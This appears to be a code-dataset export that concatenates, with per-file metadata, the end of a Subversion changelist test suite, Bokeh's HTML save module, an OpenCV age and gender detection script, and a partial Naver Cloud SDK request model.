expected_paths.append('A/D/H/chi')
expected_paths.append('A/D/H/psi')
expected_paths = sorted([os.path.join(wc_dir, x.replace('/', os.sep)) for x in expected_paths])
# Build the command line.
args = ['diff']
for cl in clname:
args.append('--changelist')
args.append(cl)
if depth:
args.append('--depth')
args.append(depth)
if is_repos_wc:
args.append('--old')
args.append(sbox.repo_url)
args.append('--new')
args.append(sbox.wc_dir)
else:
args.append(wc_dir)
# Run 'svn diff ...'
exit_code, output, errput = svntest.main.run_svn(None, *args)
# Filter the output for lines that begin with 'Index:', and
# reduce even those lines to just the actual path.
paths = sorted([x[7:].rstrip() for x in output if x[:7] == 'Index: '])
# Diff output on Win32 uses '/' path separators.
if sys.platform == 'win32':
paths = [x.replace('/', os.sep) for x in paths]
# And, compare!
if (paths != expected_paths):
raise svntest.Failure("Expected paths (%s) and actual paths (%s) "
"don't gel"
% (str(expected_paths), str(paths)))
#----------------------------------------------------------------------
def propmods_with_changelists(sbox):
"propset/del/get/list --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Set property 'name'='value' on all working copy items.
svntest.main.run_svn(None, "pset", "--depth", "infinity",
"name", "value", wc_dir)
expected_disk = svntest.main.greek_state.copy()
expected_disk.add({'' : Item(props={ 'name' : 'value' })})
expected_disk.tweak('A', 'A/B', 'A/B/E', 'A/B/E/alpha', 'A/B/E/beta',
'A/B/F', 'A/B/lambda', 'A/C', 'A/D', 'A/D/G',
'A/D/G/pi', 'A/D/G/rho', 'A/D/G/tau', 'A/D/H',
'A/D/H/chi', 'A/D/H/omega', 'A/D/H/psi', 'A/D/gamma',
'A/mu', 'iota', props={ 'name' : 'value' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Proplist the 'i' changelist
exit_code, output, errput = svntest.main.run_svn(None, "proplist", "--depth",
"infinity", "--changelist",
"i", wc_dir)
### Really simple sanity check on the output of 'proplist'. If we've got
### a proper proplist content checker anywhere, we should probably use it
### instead.
if len(output) != 6:
raise svntest.Failure
# Remove the 'name' property from files in the 'o' and 'i' changelists.
svntest.main.run_svn(None, "pdel", "--depth", "infinity",
"name", "--changelist", "o", "--changelist", "i",
wc_dir)
expected_disk.tweak('A/D/G/pi', 'A/D/G/rho', 'A/D/H/chi', 'A/D/H/psi',
props={})
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Add 'foo'='bar' property on all files under A/B to depth files and
# in changelist 'a'.
svntest.main.run_svn(None, "pset", "--depth", "files",
"foo", "bar", "--changelist", "a",
os.path.join(wc_dir, 'A', 'B'))
expected_disk.tweak('A/B/lambda', props={ 'name' : 'value',
'foo' : 'bar' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Add 'bloo'='blarg' property to all files in changelist 'a'.
svntest.main.run_svn(None, "pset", "--depth", "infinity",
"bloo", "blarg", "--changelist", "a",
wc_dir)
expected_disk.tweak('A/B/lambda', props={ 'name' : 'value',
'foo' : 'bar',
'bloo' : 'blarg' })
expected_disk.tweak('A/B/E/alpha', 'A/B/E/beta', 'A/D/H/omega', 'A/D/gamma',
'iota', props={ 'name' : 'value',
'bloo' : 'blarg' })
svntest.actions.verify_disk(wc_dir, expected_disk, True)
# Propget 'name' in files in changelists 'a' and 'i' to depth files.
exit_code, output, errput = svntest.main.run_svn(None, "pget",
"--depth", "files", "name",
"--changelist", "a",
"--changelist", "i",
wc_dir)
verify_pget_output(output, {
os.path.join(wc_dir, 'iota') : 'value',
})
# Propget 'name' in files in changelists 'a' and 'i' to depth infinity.
exit_code, output, errput = svntest.main.run_svn(None, "pget",
"--depth", "infinity",
"name",
"--changelist", "a",
"--changelist", "i",
wc_dir)
verify_pget_output(output, {
os.path.join(wc_dir, 'A', 'D', 'gamma') : 'value',
os.path.join(wc_dir, 'A', 'B', 'E', 'alpha') : 'value',
os.path.join(wc_dir, 'iota') : 'value',
os.path.join(wc_dir, 'A', 'B', 'E', 'beta') : 'value',
os.path.join(wc_dir, 'A', 'B', 'lambda') : 'value',
os.path.join(wc_dir, 'A', 'D', 'H', 'omega') : 'value',
})
#----------------------------------------------------------------------
def revert_with_changelists(sbox):
"revert --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
# Add a line of text to all the versioned files in the tree.
mod_all_files(wc_dir, "Please, oh please, revert me!\n")
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.tweak('A/B/lambda', 'A/B/E/alpha', 'A/B/E/beta',
'A/D/gamma', 'A/D/H/omega', 'iota', 'A/mu',
'A/D/G/tau', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', status='M ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a WC_DIR' (without depth, no change expected)
svntest.main.run_svn(None, "revert", "--changelist", "a", wc_dir)
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist o --depth files WC_DIR WC_DIR/A/B' (no change)
svntest.main.run_svn(None, "revert", "--depth", "files",
"--changelist", "o",
wc_dir, os.path.join(wc_dir, 'A', 'B'))
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a --depth files WC_DIR WC_DIR/A/B'
# (iota, lambda reverted)
svntest.main.run_svn(None, "revert", "--depth", "files",
"--changelist", "a",
wc_dir, os.path.join(wc_dir, 'A', 'B'))
expected_status.tweak('iota', 'A/B/lambda', status=' ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --changelist a --changelist i --depth infinity WC_DIR'
# (alpha, beta, gamma, omega, pi, chi, psi reverted)
svntest.main.run_svn(None, "revert", "--depth", "infinity",
"--changelist", "a", "--changelist", "i",
wc_dir)
expected_status.tweak('A/B/E/alpha', 'A/B/E/beta', 'A/D/gamma',
'A/D/H/omega', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', status=' ')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# 'svn revert --depth infinity WC_DIR' (back to pristine-ness)
svntest.main.run_svn(None, "revert", "--depth", "infinity",
wc_dir)
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
svntest.actions.run_and_verify_status(wc_dir, expected_status)
#----------------------------------------------------------------------
def update_with_changelists(sbox):
"update --changelist"
sbox.build()
wc_dir = sbox.wc_dir
# Add a line of text to all the versioned files in the tree, commit, update.
mod_all_files(wc_dir, "Added line.\n")
svntest.main.run_svn(None, "commit", "-m", "logmsg", wc_dir)
svntest.main.run_svn(None, "update", wc_dir)
# Add files to changelists based on the last character in their names.
changelist_all_files(wc_dir, clname_from_lastchar_cb)
### Backdate only the files in the 'a' and 'i' changelists at depth
### files under WC_DIR and WC_DIR/A/B.
# We expect update to only touch lambda and iota.
expected_output = svntest.wc.State(wc_dir, {
'A/B/lambda' : Item(status='U '),
'iota' : Item(status='U '),
})
# Disk state should have all the files except iota and lambda
# carrying new text.
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('A/B/E/alpha',
contents="This is the file 'alpha'.\nAdded line.\n")
expected_disk.tweak('A/B/E/beta',
contents="This is the file 'beta'.\nAdded line.\n")
expected_disk.tweak('A/D/gamma',
contents="This is the file 'gamma'.\nAdded line.\n")
expected_disk.tweak('A/D/H/omega',
contents="This is the file 'omega'.\nAdded line.\n")
expected_disk.tweak('A/mu',
contents="This is the file 'mu'.\nAdded line.\n")
expected_disk.tweak('A/D/G/tau',
contents="This is the file 'tau'.\nAdded line.\n")
expected_disk.tweak('A/D/G/pi',
contents="This is the file 'pi'.\nAdded line.\n")
expected_disk.tweak('A/D/H/chi',
contents="This is the file 'chi'.\nAdded line.\n")
expected_disk.tweak('A/D/H/psi',
contents="This is the file 'psi'.\nAdded line.\n")
expected_disk.tweak('A/D/G/rho',
contents="This is the file 'rho'.\nAdded line.\n")
# Status is clean, but with iota and lambda at r1 and all else at r2.
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('iota', 'A/B/lambda', wc_rev=1)
# Update.
svntest.actions.run_and_verify_update(wc_dir,
expected_output,
expected_disk,
expected_status,
None, None, None,
None, None, 1,
"-r", "1",
"--changelist", "a",
"--changelist", "i",
"--depth", "files",
wc_dir,
os.path.join(wc_dir, 'A', 'B'))
### Backdate to depth infinity all changelists "a", "i", and "o" now.
# We expect update to only touch all the files ending in 'a', 'i',
# and 'o' (except lambda and iota which were previously updated).
expected_output = svntest.wc.State(wc_dir, {
'A/D/G/pi' : Item(status='U '),
'A/D/H/chi' : Item(status='U '),
'A/D/H/psi' : Item(status='U '),
'A/D/G/rho' : Item(status='U '),
'A/B/E/alpha' : Item(status='U '),
'A/B/E/beta' : Item(status='U '),
'A/D/gamma' : Item(status='U '),
'A/D/H/omega' : Item(status='U '),
})
# Disk state should have only tau and mu carrying new text.
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('A/mu',
contents="This is the file 'mu'.\nAdded line.\n")
expected_disk.tweak('A/D/G/tau',
contents="This is the file 'tau'.\nAdded line.\n")
# Status is clean, but with iota and lambda at r1 and all else at r2.
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('iota', 'A/B/lambda', 'A/D/G/pi', 'A/D/H/chi',
'A/D/H/psi', 'A/D/G/rho', 'A/B/E/alpha',
'A/B/E/beta', 'A/D/gamma', 'A/D/H/omega', wc_rev=1)
# Update.
svntest.actions.run_and_verify_update(wc_dir,
expected_output,
expected_disk,
expected_status,
None, None, None,
None, None, 1,
"-r", "1",
"--changelist", "a",
"--changelist", "i",
"--changelist", "o",
"--depth", "infinity",
wc_dir)
def tree_conflicts_and_changelists_on_commit1(sbox):
"tree conflicts, changelists and commit"
svntest.actions.build_greek_tree_conflicts(sbox)
wc_dir = sbox.wc_dir
iota = os.path.join(wc_dir, "iota")
rho = os.path.join(wc_dir, "A", "D", "G", "rho")
# This file will ultimately be committed
svntest.main.file_append(iota, "More stuff in iota")
# Verify that the commit is blocked when we include a tree-conflicted
# item.
svntest.main.run_svn(None, "changelist", "list", iota, rho)
expected_error = ("svn: E155015: Aborting commit: '.*" + re.escape(rho)
+ "' remains in .*conflict")
svntest.actions.run_and_verify_commit(wc_dir,
None, None,
expected_error,
wc_dir,
"--changelist",
"list")
# Now, test if we can commit iota without those tree-conflicts
# getting in the way.
svntest.main.run_svn(None, "changelist", "--remove", rho)
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(verb='Sending'),
})
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('A/D/G/pi', status='D ', treeconflict='C')
expected_status.tweak('A/D/G/tau', status='! ', treeconflict='C',
wc_rev=None)
expected_status.tweak('A/D/G/rho', status='A ', copied='+',
treeconflict='C', wc_rev='-')
expected_status.tweak('iota', wc_rev=3, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"list")
def tree_conflicts_and_changelists_on_commit2(sbox):
"more tree conflicts, changelists and commit"
sbox.build()
wc_dir = sbox.wc_dir
iota = os.path.join(wc_dir, "iota")
A = os.path.join(wc_dir, "A",)
C = os.path.join(A, "C")
# Make a tree-conflict on A/C:
# Remove it, warp back, add a prop, update.
svntest.main.run_svn(None, 'delete', C)
expected_output = svntest.verify.RegexOutput(
"Deleting.*" + re.escape(C),
False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'commit', '-m', 'delete A/C', C)
expected_output = svntest.verify.RegexOutput(
"A.*" + re.escape(C), False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'update', C, "-r1")
expected_output = svntest.verify.RegexOutput(
".*'propname' set on '"
+ re.escape(C) + "'", False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'propset', 'propname', 'propval', C)
expected_output = svntest.verify.RegexOutput(
" C " + re.escape(C), False)
svntest.actions.run_and_verify_svn(None, expected_output, [],
'update', wc_dir)
expected_status = svntest.actions.get_virginal_state(wc_dir, 2)
expected_status.tweak('A/C', status='A ', copied='+',
treeconflict='C', wc_rev='-')
svntest.actions.run_and_verify_status(wc_dir, expected_status)
# So far so good. We have a tree-conflict on an absent dir A/C.
# Verify that the current situation does not commit.
expected_error = "svn: E155015: Aborting commit:.* remains in .*conflict";
svntest.actions.run_and_verify_commit(wc_dir,
None, None,
expected_error,
wc_dir)
# Now try to commit with a changelist, not letting the
# tree-conflict get in the way.
svntest.main.file_append(iota, "More stuff in iota")
svntest.main.run_svn(None, "changelist", "list", iota)
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(verb='Sending'),
})
expected_status.tweak('iota', wc_rev=3, status=' ')
svntest.actions.run_and_verify_commit(wc_dir,
expected_output,
expected_status,
None,
wc_dir,
"--changelist",
"list")
#----------------------------------------------------------------------
def move_keeps_changelist(sbox):
"'svn mv' of existing keeps the changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
iota_path = os.path.join(wc_dir, 'iota')
iota2_path = iota_path + '2'
# 'svn mv' of existing file should *copy* the changelist to the new place
svntest.main.run_svn(None, "changelist", 'foo', iota_path)
svntest.main.run_svn(None, "rename", iota_path, iota2_path)
expected_infos = [
{
'Name' : 'iota',
'Schedule' : 'delete',
'Changelist' : 'foo',
},
{
'Name' : 'iota2',
'Schedule' : 'add',
'Changelist' : 'foo', # this line fails the test
},
]
svntest.actions.run_and_verify_info(expected_infos, iota_path, iota2_path)
def move_added_keeps_changelist(sbox):
"'svn mv' of added keeps the changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
repo_url = sbox.repo_url
kappa_path = os.path.join(wc_dir, 'kappa')
kappa2_path = kappa_path + '2'
# add 'kappa' (do not commit!)
svntest.main.file_write(kappa_path, "This is the file 'kappa'.\n")
svntest.main.run_svn(None, 'add', kappa_path)
# 'svn mv' of added file should *move* the changelist to the new place
svntest.main.run_svn(None, "changelist", 'foo', kappa_path)
svntest.main.run_svn(None, "rename", kappa_path, kappa2_path)
# kappa not under version control
svntest.actions.run_and_verify_svnversion(None, kappa_path, repo_url,
[], ".*doesn't exist.*")
# kappa2 in a changelist
expected_infos = [
{
'Name' : 'kappa2',
'Schedule' : 'add',
'Changelist' : 'foo', # this line fails the test
},
]
svntest.actions.run_and_verify_info(expected_infos, kappa2_path)
@Issue(3820)
def change_to_dir(sbox):
"change file in changelist to dir"
sbox.build()
# No changelist initially
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu removed from changelist after replace with directory
svntest.actions.run_and_verify_svn(None, '^A|' + _re_cl_rem_pattern, [],
'mkdir', sbox.ospath('A/mu'))
expected_infos = [{'Changelist' : None}] # No Name for directories?
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
svntest.main.run_svn(None, "commit", "-m", "r2: replace A/mu: file->dir",
sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
svntest.main.run_svn(None, "update", "-r", "1", sbox.ospath('A'))
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu removed from changelist after replace with dir via merge
svntest.main.run_svn(None, "merge", "-c", "2", sbox.ospath('A'),
sbox.ospath('A'))
expected_infos = [{'Changelist' : None}] # No Name for directories?
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
@Issue(3822)
def revert_deleted_in_changelist(sbox):
"revert a deleted file in a changelist"
sbox.build(read_only = True)
# No changelist initially
expected_infos = [{'Name' : 'mu', 'Changelist' : None}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu visible in changelist
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'qq', sbox.ospath('A/mu'))
expected_infos = [{'Name' : 'mu', 'Changelist' : 'qq'}]
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after revert
svntest.actions.run_and_verify_svn(None, None, [],
'revert', sbox.ospath('A/mu'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after parent delete
svntest.actions.run_and_verify_svn(None, None, [], 'rm', sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
# A/mu still visible after revert
svntest.actions.run_and_verify_svn(None, None, [],
'revert', '-R', sbox.ospath('A'))
svntest.actions.run_and_verify_info(expected_infos, sbox.ospath('A/mu'))
def add_remove_non_existent_target(sbox):
"add and remove non-existent target to changelist"
sbox.build(read_only = True)
wc_dir = sbox.wc_dir
bogus_path = os.path.join(wc_dir, 'A', 'bogus')
expected_err = "svn: warning: W155010: The node '" + \
re.escape(os.path.abspath(bogus_path)) + \
"' was not found"
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', 'testlist',
bogus_path)
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', bogus_path,
'--remove')
def add_remove_unversioned_target(sbox):
"add and remove unversioned target to changelist"
sbox.build(read_only = True)
unversioned = sbox.ospath('unversioned')
svntest.main.file_write(unversioned, "dummy contents", 'w+')
expected_err = "svn: warning: W155010: The node '" + \
re.escape(os.path.abspath(unversioned)) + \
"' was not found"
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', 'testlist',
unversioned)
svntest.actions.run_and_verify_svn(None, None, expected_err,
'changelist', unversioned,
'--remove')
@Issue(3985)
def readd_after_revert(sbox):
"add new file to changelist, revert and readd"
sbox.build(read_only = True)
dummy = sbox.ospath('dummy')
svntest.main.file_write(dummy, "dummy contents")
sbox.simple_add('dummy')
svntest.actions.run_and_verify_svn(None, None, [],
'changelist', 'testlist',
dummy)
sbox.simple_revert('dummy')
svntest.main.file_write(dummy, "dummy contents")
svntest.actions.run_and_verify_svn(None, None, [],
'add', dummy)
########################################################################
# Run the tests
# list all tests here, starting with None:
test_list = [ None,
add_remove_changelists,
commit_one_changelist,
commit_multiple_changelists,
info_with_changelists,
diff_with_changelists,
propmods_with_changelists,
revert_with_changelists,
update_with_changelists,
tree_conflicts_and_changelists_on_commit1,
tree_conflicts_and_changelists_on_commit2,
move_keeps_changelist,
move_added_keeps_changelist,
change_to_dir,
revert_deleted_in_changelist,
add_remove_non_existent_target,
add_remove_unversioned_target,
readd_after_revert,
]
if __name__ == '__main__':
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
| 39.102796
| 103
| 0.552272
|
1968c874a142a149b26c744ef8143c12ce2dcee4
| 6,216
|
py
|
Python
|
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | 1
|
2021-06-03T13:13:21.000Z
|
2021-06-03T13:13:21.000Z
|
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | null | null | null |
bokeh/io/saving.py
|
snjypl/bokeh
|
c2467ee201b4516301f2893bdf7ec2c21b877a9a
|
[
"BSD-3-Clause"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from os.path import abspath
from typing import Optional, Tuple
from warnings import warn
# External imports
from jinja2 import Template
# Bokeh imports
from ..core.templates import FILE
from ..core.types import PathLike
from ..models.layouts import LayoutDOM
from ..resources import Resources, ResourcesLike
from ..settings import settings
from ..themes import Theme
from .state import State, curstate
from .util import default_filename
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
DEFAULT_TITLE = "Bokeh Plot"
__all__ = (
'save',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def save(obj: LayoutDOM, filename: Optional[PathLike] = None, resources: Optional[ResourcesLike] = None,
title: Optional[str] = None, template: Optional[Template] = None, state: Optional[State] = None) -> str:
''' Save an HTML file with the data for the current document.
Will fall back to the default output state (or an explicitly provided
:class:`State` object) for ``filename``, ``resources``, or ``title`` if they
are not provided. If the filename is not given and not provided via output state,
it is derived from the script name (e.g. ``/foo/myplot.py`` will create
``/foo/myplot.html``)
Args:
obj (LayoutDOM object) : a Layout (Row/Column), Plot or Widget object to display
filename (PathLike, e.g. str, Path, optional) : filename to save document under (default: None)
If None, use the default state configuration.
resources (Resources or ResourcesMode, optional) : A Resources config to use (default: None)
If None, use the default state configuration, if there is one.
otherwise use ``resources.INLINE``.
title (str, optional) : a title for the HTML document (default: None)
If None, use the default state title value, if there is one.
Otherwise, use "Bokeh Plot"
template (Template, optional) : HTML document template (default: FILE)
A Jinja2 Template, see bokeh.core.templates.FILE for the required template
parameters
state (State, optional) :
A :class:`State` object. If None, then the current default
implicit state is used. (default: None).
Returns:
str: the filename where the HTML file is saved.
'''
if state is None:
state = curstate()
theme = state.document.theme
filename, resources, title = _get_save_args(state, filename, resources, title)
_save_helper(obj, filename, resources, title, template, theme)
return abspath(filename)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _get_save_args(state: State, filename: Optional[PathLike], resources: Optional[ResourcesLike],
title: Optional[str]) -> Tuple[PathLike, Resources, str]:
'''
'''
filename, is_default_filename = _get_save_filename(state, filename)
resources = _get_save_resources(state, resources, is_default_filename)
title = _get_save_title(state, title, is_default_filename)
return filename, resources, title
def _get_save_filename(state: State, filename: Optional[PathLike]) -> Tuple[PathLike, bool]:
if filename is not None:
return filename, False
if state.file and not settings.ignore_filename():
return state.file.filename, False
return default_filename("html"), True
def _get_save_resources(state: State, resources: Optional[ResourcesLike], suppress_warning: bool) -> Resources:
if resources is not None:
if isinstance(resources, Resources):
return resources
else:
return Resources(mode=resources)
if state.file:
return state.file.resources
if not suppress_warning:
warn("save() called but no resources were supplied and output_file(...) was never called, defaulting to resources.CDN")
return Resources(mode=settings.resources())
def _get_save_title(state: State, title: Optional[str], suppress_warning: bool) -> str:
if title is not None:
return title
if state.file:
return state.file.title
if not suppress_warning:
warn("save() called but no title was supplied and output_file(...) was never called, using default title 'Bokeh Plot'")
return DEFAULT_TITLE
def _save_helper(obj: LayoutDOM, filename: PathLike, resources: Optional[Resources],
title: Optional[str], template: Optional[Template], theme: Optional[Theme] = None) -> None:
'''
'''
from ..embed import file_html
html = file_html(obj, resources, title=title, template=template or FILE, theme=theme)
with open(filename, mode="w", encoding="utf-8") as f:
f.write(html)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 36.139535
| 127
| 0.552124
|
3d367cbc4a8d1de3175240ab89f141eaf7acc744
| 2,903
|
py
|
Python
|
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
detect.py
|
saurabhpatel7/Age-Gender_Detection
|
c95e76b500d7ba7ceaa9830c5e0fe37799d614f1
|
[
"MIT"
] | null | null | null |
import cv2
import math
import argparse
def highlightFace(net, frame, conf_threshold=0.7):
frameOpencvDnn = frame.copy()
frameHeight = frameOpencvDnn.shape[0]
frameWidth = frameOpencvDnn.shape[1]
blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300), [104, 117, 123], True, False)
net.setInput(blob)
detections = net.forward()
faceBoxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * frameWidth)
y1 = int(detections[0, 0, i, 4] * frameHeight)
x2 = int(detections[0, 0, i, 5] * frameWidth)
y2 = int(detections[0, 0, i, 6] * frameHeight)
faceBoxes.append([x1, y1, x2, y2])
cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0), int(round(frameHeight / 150)), 8)
return frameOpencvDnn, faceBoxes
parser = argparse.ArgumentParser()
parser.add_argument('--image')
args = parser.parse_args()
faceProto = "opencv_face_detector.pbtxt"
faceModel = "opencv_face_detector_uint8.pb"
ageProto = "age_deploy.prototxt"
ageModel = "age_net.caffemodel"
genderProto = "gender_deploy.prototxt"
genderModel = "gender_net.caffemodel"
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
genderList = ['Male', 'Female']
faceNet = cv2.dnn.readNet(faceModel, faceProto)
ageNet = cv2.dnn.readNet(ageModel, ageProto)
genderNet = cv2.dnn.readNet(genderModel, genderProto)
video = cv2.VideoCapture(args.image if args.image else 0)
padding = 20
while cv2.waitKey(1) < 0:
hasFrame, frame = video.read()
if not hasFrame:
cv2.waitKey()
break
resultImg, faceBoxes = highlightFace(faceNet, frame)
if not faceBoxes:
print("No face detected")
for faceBox in faceBoxes:
face = frame[max(0, faceBox[1] - padding):
min(faceBox[3] + padding, frame.shape[0] - 1), max(0, faceBox[0] - padding)
:min(faceBox[2] + padding, frame.shape[1] - 1)]
blob = cv2.dnn.blobFromImage(face, 1.0, (227, 227), MODEL_MEAN_VALUES, swapRB=False)
genderNet.setInput(blob)
genderPreds = genderNet.forward()
gender = genderList[genderPreds[0].argmax()]
print(f'Gender: {gender}')
ageNet.setInput(blob)
agePreds = ageNet.forward()
age = ageList[agePreds[0].argmax()]
print(f'Age: {age[1:-1]} years')
cv2.putText(resultImg, f'{gender}, {age}', (faceBox[0], faceBox[1] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.8,
(0, 255, 255), 2, cv2.LINE_AA)
cv2.imshow("Detecting age and gender", resultImg)
| 37.701299
| 116
| 0.604203
|
cf9dc4030afccc4c3f9fa6f49d330a8d8d781fe5
| 9,036
|
py
|
Python
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 12
|
2018-11-20T04:30:49.000Z
|
2021-11-09T12:34:26.000Z
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 1
|
2019-01-24T15:56:15.000Z
|
2019-05-31T07:56:55.000Z
|
lib/services/vserver/ncloud_vserver/model/get_access_control_group_list_request.py
|
NaverCloudPlatform/ncloud-sdk-python
|
5976dfabd205c615fcf57ac2f0ab67313ee6953c
|
[
"MIT"
] | 6
|
2018-06-29T03:45:50.000Z
|
2022-03-18T01:51:45.000Z
|
# coding: utf-8
"""
vserver
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetAccessControlGroupListRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'region_code': 'str',
'access_control_group_no_list': 'list[str]',
'access_control_group_name': 'str',
'access_control_group_status_code': 'str',
'page_no': 'int',
'page_size': 'int',
'vpc_no': 'str'
}
attribute_map = {
'region_code': 'regionCode',
'access_control_group_no_list': 'accessControlGroupNoList',
'access_control_group_name': 'accessControlGroupName',
'access_control_group_status_code': 'accessControlGroupStatusCode',
'page_no': 'pageNo',
'page_size': 'pageSize',
'vpc_no': 'vpcNo'
}
def __init__(self, region_code=None, access_control_group_no_list=None, access_control_group_name=None, access_control_group_status_code=None, page_no=None, page_size=None, vpc_no=None): # noqa: E501
"""GetAccessControlGroupListRequest - a model defined in Swagger""" # noqa: E501
self._region_code = None
self._access_control_group_no_list = None
self._access_control_group_name = None
self._access_control_group_status_code = None
self._page_no = None
self._page_size = None
self._vpc_no = None
self.discriminator = None
if region_code is not None:
self.region_code = region_code
if access_control_group_no_list is not None:
self.access_control_group_no_list = access_control_group_no_list
if access_control_group_name is not None:
self.access_control_group_name = access_control_group_name
if access_control_group_status_code is not None:
self.access_control_group_status_code = access_control_group_status_code
if page_no is not None:
self.page_no = page_no
if page_size is not None:
self.page_size = page_size
if vpc_no is not None:
self.vpc_no = vpc_no
@property
def region_code(self):
"""Gets the region_code of this GetAccessControlGroupListRequest. # noqa: E501
REGION코드 # noqa: E501
